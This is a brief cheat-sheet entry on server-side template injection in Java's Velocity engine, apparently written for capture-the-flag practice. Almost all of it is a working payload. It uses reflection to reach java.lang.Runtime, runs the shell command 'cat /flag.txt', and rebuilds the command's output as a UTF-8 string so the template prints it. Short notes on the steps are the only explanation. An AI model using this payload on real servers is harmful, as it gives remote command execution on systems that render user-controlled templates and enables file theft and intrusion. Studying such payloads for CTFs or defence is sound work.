SSTI
Server Side Template Injections
Java - Velocity
- Runs command
- Gets
String([binary], encoding) constructor (we can't call new in context of template)
- Calls constructor to convert binary array of command output to UTF-8 string for printing
----
#set($name="bar")
#set($p=$name.getClass().forName("java.lang.Runtime").getRuntime().exec("cat /flag.txt"))
$p.waitFor()
$p.toString()
#set($sc=$name.getClass().getConstructor($name.getClass().forName("[B"), $name.getClass()))
#set($b=$sc.newInstance($p.inputStream.readAllBytes(), "UTF-8"))
===
$b.toString()
===
3
----
